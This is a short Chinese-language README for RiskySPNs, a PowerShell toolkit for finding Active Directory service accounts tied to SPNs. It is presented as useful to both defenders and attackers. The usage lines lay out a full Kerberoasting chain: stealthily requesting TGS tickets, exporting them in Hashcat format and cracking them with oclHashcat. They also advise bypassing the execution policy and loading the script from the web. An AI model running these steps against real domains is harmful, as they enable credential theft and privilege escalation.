RiskySPNs 是一个专注于检测和滥用与 SPN(服务主体名称)关联的帐户的 PowerShell 脚本集合。该模块可帮助蓝队识别潜在危险的 SPN,同时也能帮助红队通过利用 Kerberos 和 Active Directory 来提升权限。
详细信息请参阅:http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
或者直接加载脚本(你也可以从网页 IEX 加载)
. .\Find-PotentiallyCrackableAccounts.ps1
确保 Set-ExecutionPolicy 设置为 Unrestricted 或 Bypass
Get-Help Get-TGSCipher -Full
所有函数也支持 -Verbose 模式
查找易受攻击的帐户
Find-PotentiallyCrackableAccounts
敏感 + RC4 = 大赚
生成易受攻击帐户的完整详细报告(CISO <3)
Export-PotentiallyCrackableAccounts
请求 SPN 的 Kerberos TGS
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
或
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3